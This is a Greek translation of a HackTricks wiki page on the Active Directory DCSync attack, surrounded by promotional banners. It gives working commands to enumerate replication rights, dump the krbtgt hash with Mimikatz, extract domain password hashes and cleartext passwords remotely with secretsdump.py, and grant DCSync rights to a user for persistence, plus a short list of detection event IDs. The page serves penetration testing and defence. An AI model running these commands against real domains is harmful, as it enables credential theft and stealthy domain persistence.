9.5 KiB
DCSync
Χρησιμοποιήστε το Trickest για εύκολη δημιουργία και αυτοματοποίηση ροών εργασίας με τα πιο προηγμένα εργαλεία της κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα αποθετήρια του HackTricks και του HackTricks Cloud.
DCSync
Η άδεια DCSync σημαίνει ότι έχετε αυτές τις άδειες πάνω στον ίδιο τον τομέα: DS-Replication-Get-Changes, Replicating Directory Changes All και Replicating Directory Changes In Filtered Set.
Σημαντικές σημειώσεις σχετικά με το DCSync:
- Η επίθεση DCSync προσομοιώνει τη συμπεριφορά ενός ελεγκτή τομέα και ζητά από άλλους ελεγκτές τομέα να αντιγράψουν πληροφορίες χρησιμοποιώντας το Πρωτόκολλο Απομακρυσμένης Υπηρεσίας Αναπαραγωγής Καταλόγου (MS-DRSR). Καθώς το MS-DRSR είναι μια έγκυρη και απαραίτητη λειτουργία του Active Directory, δεν μπορεί να απενεργοποιηθεί ή απενεργοποιηθεί.
- Από προεπιλογή, μόνο οι ομάδες Domain Admins, Enterprise Admins, Administrators και Domain Controllers έχουν τα απαιτούμενα προνόμια.
- Εάν κάποιος κωδικοί πρόσβασης αποθηκεύονται με αντιστρεπτή κρυπτογράφηση, υπάρχει δυνατότητα στο Mimikatz να επιστραφεί ο κωδικός πρόσβασης σε καθαρό κείμενο
Απαρίθμηση
Ελέγξτε ποιος έχει αυτές τις άδειες χρησιμοποιώντας το powerview
:
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
Εκμετάλλευση Τοπικά
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Εκμετάλλευση απομακρυσμένα
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
-just-dc
δημιουργεί 3 αρχεία:
- ένα με τις κατακευή NTLM
- ένα με τα κλειδιά Kerberos
- ένα με κείμενο καθαρού κειμένου από το NTDS για οποιονδήποτε λογαριασμό έχει ενεργοποιημένη την αντιστρεπτή κρυπτογράφηση. Μπορείτε να πάρετε χρήστες με αντιστρεπτή κρυπτογράφηση με την εντολή
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
Μόνιμη Παρουσία
Αν είστε διαχειριστής τομέα, μπορείτε να χορηγήσετε αυτές τις άδειες σε οποιονδήποτε χρήστη με τη βοήθεια του powerview
:
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
Στη συνέχεια, μπορείτε να ελέγξετε εάν ο χρήστης ανατέθηκε σωστά τα 3 προνόμια αναζητώντας τα στην έξοδο του (θα πρέπει να μπορείτε να δείτε τα ονόματα των προνομίων μέσα στο πεδίο "ObjectType"):
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
Αντιμετώπιση
- Ασφάλεια Συμβάντος ID 4662 (Η πολιτική ελέγχου για το αντικείμενο πρέπει να είναι ενεργοποιημένη) – Έγινε μια λειτουργία σε ένα αντικείμενο
- Ασφάλεια Συμβάντος ID 5136 (Η πολιτική ελέγχου για το αντικείμενο πρέπει να είναι ενεργοποιημένη) – Ένα αντικείμενο υπηρεσίας καταλόγου τροποποιήθηκε
- Ασφάλεια Συμβάντος ID 4670 (Η πολιτική ελέγχου για το αντικείμενο πρέπει να είναι ενεργοποιημένη) – Οι άδειες σε ένα αντικείμενο άλλαξαν
- AD ACL Scanner - Δημιουργήστε και συγκρίνετε αναφορές δημιουργίας ACLs. https://github.com/canix1/ADACLScanner
Αναφορές
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync
- https://yojimbosecurity.ninja/dcsync/
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα τηλεγραφή ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια στο GitHub.
Χρησιμοποιήστε το Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας με τα πιο προηγμένα εργαλεία της κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}